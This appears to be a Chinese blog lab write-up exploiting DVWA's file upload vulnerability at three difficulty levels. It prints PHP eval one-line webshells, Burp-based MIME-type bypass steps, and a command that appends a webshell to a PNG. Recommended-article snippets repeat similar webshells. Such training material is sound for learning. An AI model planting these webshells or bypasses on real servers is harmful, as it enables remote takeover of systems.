文件上传漏洞--dvwa

最新推荐文章于 2024-11-11 08:41:51 发布
最新推荐文章于 2024-11-11 08:41:51 发布
阅读量473 收藏 8
点赞数 4
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62202418/article/details/134620904
版权
本文详细描述了在DVWA靶场上测试PHP文件上传功能的过程,从低级尝试上传一句话木马,到中级阶段遭遇类型限制,高级阶段使用BP拦截并尝试绕过,最后验证文件上传功能的完整性以及潜在的安全问题。
摘要由CSDN通过智能技术生成

low

1. 启动dvwa 靶场

2. 上传一句话木马<?php @eval($_REQUEST[777]);phpinfo();?>

3. 上传成功,文件路径已经给出,访问一下

4. PHP 代码成功运行,尝试蚁剑连接连接成功

medium

1. 尝试上传一句话木马

上传失败,提示只能上传JPEG、PNG格式的文件,应该是对文件的类型做了限制

2. 查看源代码
此处,对文件的类型和大小做了过滤

3. BP抓个包
将文件类型改为image/png提示上传成功

4. 访问一下

5. PHP 代码成功运行,尝试进行蚁剑连接
连接成功

high

  1. 上传一句话木马,开启BP拦截,抓取数据包

  2. 文件上传失败,提示只能上传类型为JPEG、PNG的文件
  3. 修改文件名为1.png ,文件类型为image/png尝试上传
    上传失败

  4. 上传一张正常的图片,查看一下文件上传功能是否正常

  5. 上传一张正常的图片,能够上传成功,文件上传功能正常
  6. 使用命令做一张图片木马
    copy dvwa.png/b+1.php/a dvwa_1.png

  7. 图片的末尾有一句话木马

  8. 尝试上传图片木马
    上传成功

  9. 虽然文件已经上传成功,但是不能getshell
    找到刚才上传图片木马的数据包

奋斗的马喽
关注
蚁剑+DVWA文件上传漏洞Upload)
初学者L_言的博客
10-30 6324
蚁剑+DVWA文件上传漏洞Upload) 工具 虚拟机:owasp-bwa 主机:windows10 蚁剑 AntSword 文件上传漏洞(Upload) 第一步:登入DVWA 注:这里使用的是low等级,毕竟目的是演示如何蚁剑的连接 第二步:准备hack.php <?php @eval($_POST['hack']) ?> 第三步:从DVWA上传hack.php 显示上传成功!...
打点神器AntSword(中国蚁剑)联动dvwa文件上传漏洞实验过程
weixin_69925635的博客
05-31 386
本机:kali 靶机:ubuntu18.04,安装dvwa,url:192.168.204.132/dvwa。写入一句话木马,进入192.168.204.132/dvwa文件上传漏洞下,将一句话木马上传。打开蚁剑,右键新增数据,填写url和密码,这里url要逐步拼接直到不出现404。点击初始化,并选择刚刚创建的另一个文件夹,这个时候会开始自行安装核心源码。下载完毕后解压,并在当前文件夹下再建一个文件夹,要求不能有中文和重复名字。再次回到加载器目录,启动蚁剑,开始使用。
DVWA】——File Upload(文件上传
HinsCoder的博客
09-15 704
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA---文件上传
孤的博客
11-20 503
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA--文件上传漏洞
xiaoxiao的博客
11-28 1528
文件上传漏洞定义 文件上传漏洞通常是由于上传文件的类型、内容没有进行严格的过滤检查,使得可以通过上传webshell获取服务器权限,因此文件上传漏洞带来的危害通常是毁灭性的。 文件上传漏洞的前提 能上传的木马 上传的木马可执行 还要清楚上传后的路径 实现过程 LOW级别 源码 basename(path,suffix):返回path中的文件名部分,如果可选参数suffix为空,则返回的文...
DVWA-文件上传漏洞代码审计(Medium、High)
oyqsb的博客
06-12 594
需要利用文件包含漏洞来执行php脚本,将上传的图片位置贴到文件包含漏洞利用处,访问后会返回一堆乱码即成功。若服务端脚本语言未对上传的文件进行严格的过滤,会导致用户上传木马、病毒或恶意脚本,从而获得服务端的控制权限。:返回一个字符串在另一个字符串最后一次出现的位数(注意字符串是从0开始而不是1)将一张普通图片和php脚本copy出一个包含木马的图片。打开蚁剑添加url和密码。:通过指定长度来截取字符串,通过和上一个函数的配合截取出后缀名。:将上传的文件移动到新位置,这里表示移动到指定目录。
DVWA系列---File Upload 文件上传漏洞
野原新之助
01-27 551
文章目录一、前言二、Low级别1、演示三、Medium级别四、High级别 一、前言 文件上传漏洞是指: 服务器对用户上传的文件没有进行严格过滤,导致用户上传了一些危险文件(如一句话木马的php文件),然后访问这些危险文件,对服务器造成控制或破坏。 预防方法: 1、对用户可上传的文件类型及进行严格控制,设置白名单,防止用户上传危险文件; 2、对上传的文件进行文件名转换,防止用户直接访问到上传的文件...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 8658
dvwa靶场实践-低中高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 2127
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【网络安全 | 漏洞挖掘】隐藏的 DOS 技术
最新发布
等风来
11-11 151
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-07 1215
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
数据安全、信息安全、网络安全区别与联系
2401_88326591的博客
11-07 891
信息安全是保护信息系统免受意外或故意的非授权泄漏、传递、修改或破坏。
shodan 【2】(泷羽sec)
m0_68984471的博客
11-08 858
shodan的使用方法
标题:网络安全:数字时代的守护盾
运维人生
11-08 567
网络安全是指保护网络系统中的硬件、软件及数据免受恶意攻击、破坏、泄露或非法使用的状态和能力。系统安全:确保服务器、路由器、交换机等网络基础设施的安全运行,防止被非法入侵或篡改。数据安全:保护存储在网络中的数据不被未经授权的访问、泄露、修改或删除。应用安全:确保网络应用程序(如网站、移动APP)没有安全漏洞,能够抵御恶意软件的攻击。身份与访问管理:通过认证、授权和审计机制,确保只有合法用户才能访问特定资源。网络安全意识:提高用户对网络威胁的认识,教育他们如何识别和防范钓鱼邮件、恶意链接等常见攻击手段。
【网络安全 | 并发问题】Nginx重试机制与幂等性问题分析
等风来
11-09 297
在现代互联网应用中,高可用性(HA)是确保系统稳定性的关键要求之一。为了应对服务器出现故障或超时等问题,负载均衡被广泛应用于分布式系统中。Nginx作为一种高性能的反向代理服务器,常常被用于实现负载均衡和容错功能。当被代理的服务出现错误时,Nginx可以自动将请求转发到其他健康的服务器,从而提高系统的可用性和容错能力。然而,在实际应用中,Nginx的错误重试机制可能会导致一些业务上的意外问题,尤其是在处理非幂等性HTTP请求(如POST、DELETE)时。
【网络安全 | 漏洞挖掘】Google SSO用户的帐户接管
等风来
11-11 120
获取CSRF令牌相对简单,它位于用户资料页面(https://target.com/profile)的meta标签中。利用XSS,我们可以针对任何使用Google SSO登录的账户发送“解绑Google账户”请求,然后暴力破解OTP。遗憾的是,我们发现的所有潜在请求都非常安全,没有可供利用的绕过方式。当使用Google SSO登录后,用户有一个选项可以解绑Google账户,从而改用邮箱和密码登录。在这篇博文中,我将详细介绍找到针对Google SSO用户的账号接管(ATO)漏洞的过程。
蓝桥杯-网络安全比赛题目-遗漏的压缩包
Superstacks超全栈
11-06 1332
可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’输入密码,通过蚁剑进入SHELL。进入根目录,找到flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值